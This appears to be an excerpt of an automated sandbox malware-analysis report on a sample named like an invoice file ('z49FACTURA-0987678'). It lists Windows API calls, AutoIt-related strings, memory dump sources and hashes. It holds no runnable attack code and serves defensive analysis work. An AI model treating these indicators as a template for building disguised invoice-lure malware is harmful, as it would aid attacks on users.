                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                                            • String ID:
                                                                            • API String ID: 2797419724-0
                                                                            APIs
                                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00EFA12A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled
                                                                            • String ID:
                                                                            • API String ID: 3192549508-0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?,00F5F910), ref: 00F53627
                                                                            • IsWindowVisible.USER32(?), ref: 00F5364B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpperVisibleWindow
                                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                            • API String ID: 4105515805-45149045
                                                                            APIs
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00F5A630
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00F5A661
                                                                            • GetSysColor.USER32(0000000F), ref: 00F5A66D
                                                                            • SetBkColor.GDI32(?,000000FF), ref: 00F5A687
                                                                            • SelectObject.GDI32(?,00000000), ref: 00F5A696
                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 00F5A6C1
                                                                            • GetSysColor.USER32(00000010), ref: 00F5A6C9
                                                                            • CreateSolidBrush.GDI32(00000000), ref: 00F5A6D0
                                                                            • FrameRect.USER32(?,?,00000000), ref: 00F5A6DF
                                                                            • DeleteObject.GDI32(00000000), ref: 00F5A6E6
                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 00F5A731
                                                                            • FillRect.USER32(?,?,00000000), ref: 00F5A763
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00F5A78E
                                                                              • Part of subcall function 00F5A8CA: GetSysColor.USER32(00000012), ref: 00F5A903
                                                                              • Part of subcall function 00F5A8CA: SetTextColor.GDI32(?,?), ref: 00F5A907
                                                                              • Part of subcall function 00F5A8CA: GetSysColorBrush.USER32(0000000F), ref: 00F5A91D
                                                                              • Part of subcall function 00F5A8CA: GetSysColor.USER32(0000000F), ref: 00F5A928
                                                                              • Part of subcall function 00F5A8CA: GetSysColor.USER32(00000011), ref: 00F5A945
                                                                              • Part of subcall function 00F5A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F5A953
                                                                              • Part of subcall function 00F5A8CA: SelectObject.GDI32(?,00000000), ref: 00F5A964
                                                                              • Part of subcall function 00F5A8CA: SetBkColor.GDI32(?,00000000), ref: 00F5A96D
                                                                              • Part of subcall function 00F5A8CA: SelectObject.GDI32(?,?), ref: 00F5A97A
                                                                              • Part of subcall function 00F5A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00F5A999
                                                                              • Part of subcall function 00F5A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F5A9B0
                                                                              • Part of subcall function 00F5A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00F5A9C5
                                                                              • Part of subcall function 00F5A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F5A9ED
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                            • String ID:
                                                                            • API String ID: 3521893082-0
                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000), ref: 00F474DE
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F4759D
                                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00F475DB
                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00F475ED
                                                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00F47633
                                                                            • GetClientRect.USER32(00000000,?), ref: 00F4763F
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00F47683
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F47692
• GetStockObject.GDI32(00000011), ref: 00F476A2
• SelectObject.GDI32(00000000,00000000), ref: 00F476A6
• GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00F476B6
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F476BF
• DeleteDC.GDI32(00000000), ref: 00F476C8
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F476F4
• SendMessageW.USER32(00000030,00000000,00000001), ref: 00F4770B
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00F47746
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F4775A
• SendMessageW.USER32(00000404,00000001,00000000), ref: 00F4776B
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00F4779B
• GetStockObject.GDI32(00000011), ref: 00F477A6
• SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F477B1
• ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00F477BB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
• API String ID: 2910397461-517079104
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00F3AD1E
• GetDriveTypeW.KERNEL32(?,00F5FAC0,?,\\.\,00F5F910), ref: 00F3ADFB
• SetErrorMode.KERNEL32(00000000,00F5FAC0,?,\\.\,00F5F910), ref: 00F3AF59
Strings
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
• API String ID: 2907320926-4222207086
APIs
Strings
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
• API String ID: 1038674560-86951937
APIs
• DestroyWindow.USER32(?,?,?), ref: 00ED2CA2
• DeleteObject.GDI32(00000000), ref: 00ED2CE8
• DeleteObject.GDI32(00000000), ref: 00ED2CF3
• DestroyCursor.USER32(00000000), ref: 00ED2CFE
• DestroyWindow.USER32(00000000,?,?,?), ref: 00ED2D09
• SendMessageW.USER32(?,00001308,?,00000000), ref: 00F0C43B
• 6FCB0200.COMCTL32(?,000000FF,?), ref: 00F0C474
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00F0C89D
  • Part of subcall function 00ED1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00ED2036,?,00000000,?,?,?,?,00ED16CB,00000000,?), ref: 00ED1B9A
• SendMessageW.USER32(?,00001053), ref: 00F0C8DA
• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00F0C8F1
Strings
Similarity
• API ID: DestroyMessageSendWindow$DeleteObject$B0200CursorInvalidateMoveRect
• String ID: 0
• API String ID: 3010530511-4108050209
APIs
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00F59AD2
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00F59B8B
• SendMessageW.USER32(?,00001102,00000002,?), ref: 00F59BA7
Strings
Similarity
• API ID: MessageSend$Window
• String ID: 0
• API String ID: 2326795674-4108050209
APIs
• GetSysColor.USER32(00000012), ref: 00F5A903
• SetTextColor.GDI32(?,?), ref: 00F5A907
• GetSysColorBrush.USER32(0000000F), ref: 00F5A91D
• GetSysColor.USER32(0000000F), ref: 00F5A928
• CreateSolidBrush.GDI32(?), ref: 00F5A92D
• GetSysColor.USER32(00000011), ref: 00F5A945
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F5A953
• SelectObject.GDI32(?,00000000), ref: 00F5A964
• SetBkColor.GDI32(?,00000000), ref: 00F5A96D
• SelectObject.GDI32(?,?), ref: 00F5A97A
• InflateRect.USER32(?,000000FF,000000FF), ref: 00F5A999
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F5A9B0
• GetWindowLongW.USER32(00000000,000000F0), ref: 00F5A9C5
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F5A9ED
• GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F5AA14
• InflateRect.USER32(?,000000FD,000000FD), ref: 00F5AA32
• DrawFocusRect.USER32(?,?), ref: 00F5AA3D
• GetSysColor.USER32(00000011), ref: 00F5AA4B
• SetTextColor.GDI32(?,00000000), ref: 00F5AA53
• DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F5AA67
• SelectObject.GDI32(?,00F5A5FA), ref: 00F5AA7E
• DeleteObject.GDI32(?), ref: 00F5AA89
• SelectObject.GDI32(?,?), ref: 00F5AA8F
• DeleteObject.GDI32(?), ref: 00F5AA94
• SetTextColor.GDI32(?,?), ref: 00F5AA9A
• SetBkColor.GDI32(?,?), ref: 00F5AAA4
Similarity
• API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
• String ID:
• API String ID: 1996641542-0
APIs
• SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F58AC1
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F58AD2
• CharNextW.USER32(0000014E), ref: 00F58B01
• SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F58B42
• SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F58B58
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F58B69
• SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F58B86
• SetWindowTextW.USER32(?,0000014E), ref: 00F58BD8
• SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F58BEE
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00F58C1F
• _memset.LIBCMT ref: 00F58C44
• SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F58C8D
• _memset.LIBCMT ref: 00F58CEC
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F58D16
• SendMessageW.USER32(?,00001074,?,00000001), ref: 00F58D6E
• SendMessageW.USER32(?,0000133D,?,?), ref: 00F58E1B
• InvalidateRect.USER32(?,00000000,00000001), ref: 00F58E3D
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F58E87
• SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F58EB4
• DrawMenuBar.USER32(?), ref: 00F58EC3
• SetWindowTextW.USER32(?,0000014E), ref: 00F58EEB
Strings
Similarity
• API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
• String ID: 0
• API String ID: 1073566785-4108050209
APIs
• GetCursorPos.USER32(?), ref: 00F549CA
• GetDesktopWindow.USER32 ref: 00F549DF
• GetWindowRect.USER32(00000000), ref: 00F549E6
• GetWindowLongW.USER32(?,000000F0), ref: 00F54A48
• DestroyWindow.USER32(?), ref: 00F54A74
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F54A9D
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F54ABB
• SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F54AE1
• SendMessageW.USER32(?,00000421,?,?), ref: 00F54AF6
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F54B09
• IsWindowVisible.USER32(?), ref: 00F54B29
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F54B44
• SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F54B58
• GetWindowRect.USER32(?,?), ref: 00F54B70
• MonitorFromPoint.USER32(?,?,00000002), ref: 00F54B96
• GetMonitorInfoW.USER32(00000000,?), ref: 00F54BB0
• CopyRect.USER32(?,?), ref: 00F54BC7
• SendMessageW.USER32(?,00000412,00000000), ref: 00F54C32
Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                            • String ID: ($0$tooltips_class32
                                                                            • API String ID: 698492251-4156429822
                                                                            • Opcode ID: 860f2798ec989d7150b347101c543fbbb3e5ba716e7e14a4f870bff18f0f9177
                                                                            • Instruction ID: 24a5e9bd9dfd4197e4a8a6675a12668eee49440f5556abe9b1b944a851f0df1c
                                                                            • Opcode Fuzzy Hash: 860f2798ec989d7150b347101c543fbbb3e5ba716e7e14a4f870bff18f0f9177
                                                                            • Instruction Fuzzy Hash: BDB1BD71604340AFDB04DF64C849B6ABBE4FF88315F00891DFA99AB2A1D770EC49DB95
                                                                            APIs
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00ED28BC
                                                                            • GetSystemMetrics.USER32(00000007), ref: 00ED28C4
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00ED28EF
                                                                            • GetSystemMetrics.USER32(00000008), ref: 00ED28F7
                                                                            • GetSystemMetrics.USER32(00000004), ref: 00ED291C
                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00ED2939
                                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00ED2949
                                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00ED297C
                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00ED2990
                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 00ED29AE
                                                                            • GetStockObject.GDI32(00000011), ref: 00ED29CA
                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00ED29D5
                                                                              • Part of subcall function 00ED2344: GetCursorPos.USER32(?), ref: 00ED2357
                                                                              • Part of subcall function 00ED2344: ScreenToClient.USER32(00F957B0,?), ref: 00ED2374
                                                                              • Part of subcall function 00ED2344: GetAsyncKeyState.USER32(00000001), ref: 00ED2399
                                                                              • Part of subcall function 00ED2344: GetAsyncKeyState.USER32(00000002), ref: 00ED23A7
                                                                            • SetTimer.USER32(00000000,00000000,00000028,00ED1256), ref: 00ED29FC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                            • String ID: AutoIt v3 GUI
                                                                            • API String ID: 1458621304-248962490
                                                                            • Opcode ID: ace52a26365e2749353cf3ddf3d86a8ea8f0bc98f19b3b81a6eb5129d319b776
                                                                            • Instruction ID: 8abd7512aa76764d0759d64d2bbb31f0bf1a14112497f1f4d75e37850e6b2c01
                                                                            • Opcode Fuzzy Hash: ace52a26365e2749353cf3ddf3d86a8ea8f0bc98f19b3b81a6eb5129d319b776
                                                                            • Instruction Fuzzy Hash: D3B18D71A0020AEFDB15DFA8DC45BAE7BB4FB18711F10422AFA15E72E0DB749841EB50
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscat$B1560_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                            • API String ID: 2719676056-1459072770
                                                                            • Opcode ID: 0fe7decaab90a30928a1b49f405fe2c9f0f153457eb8392b277d46ccd97e418b
                                                                            • Instruction ID: 5ac88beface929a26737d439b45077626203056cc85234bacecc8f176e7c8489
                                                                            • Opcode Fuzzy Hash: 0fe7decaab90a30928a1b49f405fe2c9f0f153457eb8392b277d46ccd97e418b
                                                                            • Instruction Fuzzy Hash: AF41F6729402087BDB11AA74DC07EFF77ACDF45720F04006AFB04F6182EB35EA05A6A6
                                                                            APIs
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00F2A47A
                                                                            • __swprintf.LIBCMT ref: 00F2A51B
                                                                            • _wcscmp.LIBCMT ref: 00F2A52E
                                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00F2A583
                                                                            • _wcscmp.LIBCMT ref: 00F2A5BF
                                                                            • GetClassNameW.USER32(?,?,00000400), ref: 00F2A5F6
                                                                            • GetDlgCtrlID.USER32(?), ref: 00F2A648
                                                                            • GetWindowRect.USER32(?,?), ref: 00F2A67E
                                                                            • GetParent.USER32(?), ref: 00F2A69C
                                                                            • ScreenToClient.USER32(00000000), ref: 00F2A6A3
                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00F2A71D
                                                                            • _wcscmp.LIBCMT ref: 00F2A731
                                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 00F2A757
                                                                            • _wcscmp.LIBCMT ref: 00F2A76B
                                                                              • Part of subcall function 00EF362C: _iswctype.LIBCMT ref: 00EF3634
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                            • String ID: %s%u
                                                                            • API String ID: 3744389584-679674701
                                                                            • Opcode ID: aaff7a7be0f5c6bda29c6095d8642acd322cba278e8bf4e3a0a712a6c7074af2
                                                                            • Instruction ID: 6ab719b3486bf431f1caeea862001902d0cbe1c14f360090f297abf6a78bf40f
                                                                            • Opcode Fuzzy Hash: aaff7a7be0f5c6bda29c6095d8642acd322cba278e8bf4e3a0a712a6c7074af2
                                                                            • Instruction Fuzzy Hash: B9A10271604726BFC714DF60D884FAAB7E8FF44320F008529FA99D6190EB30E955DB92
                                                                            APIs
                                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 00F2AF18
                                                                            • _wcscmp.LIBCMT ref: 00F2AF29
                                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 00F2AF51
                                                                            • CharUpperBuffW.USER32(?,00000000), ref: 00F2AF6E
                                                                            • _wcscmp.LIBCMT ref: 00F2AF8C
                                                                            • _wcsstr.LIBCMT ref: 00F2AF9D
                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00F2AFD5
                                                                            • _wcscmp.LIBCMT ref: 00F2AFE5
                                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 00F2B00C
                                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 00F2B055
                                                                            • _wcscmp.LIBCMT ref: 00F2B065
                                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 00F2B08D
                                                                            • GetWindowRect.USER32(00000004,?), ref: 00F2B0F6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                            • String ID: @$ThumbnailClass
                                                                            • API String ID: 1788623398-1539354611
                                                                            • Opcode ID: 4056a7ad011d91de42f95c99df6d5a88612997cb178bf7e9b865918ee8e096bb
                                                                            • Instruction ID: 85ba45b01cd97f79a53ac7e4aa2312893c2f4f5f1221cf11df72907c3e030424
                                                                            • Opcode Fuzzy Hash: 4056a7ad011d91de42f95c99df6d5a88612997cb178bf7e9b865918ee8e096bb
                                                                            • Instruction Fuzzy Hash: 4A81D1714083199FDB01DF10E985FAA77E8FF84324F04846AFD859A096DB34DD49EB62
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
